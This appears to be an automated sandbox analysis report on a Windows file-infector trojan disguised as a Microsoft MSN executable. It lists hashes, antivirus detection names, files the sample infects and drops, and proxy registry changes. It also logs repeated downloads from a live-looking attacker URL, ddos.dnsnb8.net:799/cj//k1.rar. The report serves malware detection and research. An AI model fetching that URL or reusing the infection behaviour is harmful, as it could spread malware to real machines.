Analysis Date: 2016-01-07 01:52:05
MD5: b79363a8c8c29b3826bb8fd557bb74cb
SHA1: 82cff3f73b8fa1563b836f2a86cb8a8802466c87

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: d796e4ff5c4d9c5ca2d1b90272d6d6b8 sha1: 0755e4acb128a57a55d97d2e967825b0a5393d30 size: 65536
Section: .data md5: 789f8dbcfc8423c0c1058375d02239bf sha1: f0b25955806641c0017dfcc1eaafd33c8c24a187 size: 4096
Section: .rsrc md5: 95c3a4840354bf62ec32d7ce9f5c6cb2 sha1: 2b3cddb7b110e371697ebf99e4de9d01e8674e77 size: 4096
Section: X?5u{ md5: d1548cc9e1660d34f63b32ac1011f5cf sha1: ec42a80520b78d83e7c26e1dd72afb7f363c1ccc size: 20480
Timestamp: 2001-07-19 19:30:07
Pdb path: pdb
Version:
LegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: copymar
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: copymar
OriginalFilename: copymar.exe
PEhash: bdcf3af793fc6cefedb0fa9ef526d3dea0b02aae
IMPhash: 6df6e99bae10817058127898c796b82d
AV CA (E-Trust Ino): Win32/Nimnul.A
AV Rising: Win32.Roue.a
AV Mcafee: W32/Kudj
AV Avira (antivir): W32/Jadtre.B
AV Twister: Virus.558BEC81EC@120000#.mg
AV Ad-Aware: Win32.VJadtre.3
AV Alwil (avast): Malware-gen:Evo-gen [Susp]:Win32:Malware-gen
AV Eset (nod32): Win32/Wapomi.BA virus
AV Grisoft (avg): Win32/Wapomi.I
AV Symantec: W32.Wapomi.C!inf
AV Fortinet: W32/Nimnul.F
AV BitDefender: Win32.VJadtre.3
AV K7: Virus ( 0040f7441 )
AV Microsoft Security Essentials: Virus:Win32/Mikcer.B
AV MicroWorld (escan): Win32.VJadtre.3
AV MalwareBytes: Trojan.FakeMS.ED
AV Authentium: W32/PatchLoad.E
AV Frisk (f-prot): W32/PatchLoad.E
AV Ikarus: Trojan-Downloader.Win32.Small
AV Emsisoft: Win32.VJadtre.3
AV Zillya!: Virus.Nimnul.Win32.5
AV Kaspersky: Virus.Win32.Nimnul.f
AV Trend Micro: PE_WAPOMI.BM
AV CAT (quickheal): W32.Nimnul.F1
AV VirusBlokAda (vba32): Virus.Nimnul.19209
AV BullGuard: Win32.VJadtre.3
AV Arcabit (arcavir): Win32.VJadtre.3
AV ClamAV: Win.Trojan.Downloader-64296
AV Dr. Web: BackDoor.Darkshell.246
AV F-Secure: Win32.VJadtre.3

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\GCI.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\GCI.exe

Process
↳ C:\WINDOWS\system32\cmd.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\GCI.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\GTplus\Time ➝ NULL
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\msnsusii.exe
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Digcore.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\10ff3eb0.bat
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates File: C:\temp\files\malware.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Msncli.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Creates File: C:\temp\files\GCI.exe
Winsock DNS: ddos.dnsnb8.net
Winsock URL: http://ddos.dnsnb8.net:799/cj//k1.rar

Network Details:

DNS: ddos.dnsnb8.net
Type: A
23.253.76.160
HTTP GET: http://ddos.dnsnb8.net:799/cj//k1.rar (request repeated 5 times)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 23.253.76.160:799
Flows TCP: 192.168.1.1:1033 ➝ 23.253.76.160:799
Flows TCP: 192.168.1.1:1034 ➝ 23.253.76.160:799
Flows TCP: 192.168.1.1:1035 ➝ 23.253.76.160:799
Flows TCP: 192.168.1.1:1036 ➝ 23.253.76.160:799

Raw Pcap

Strings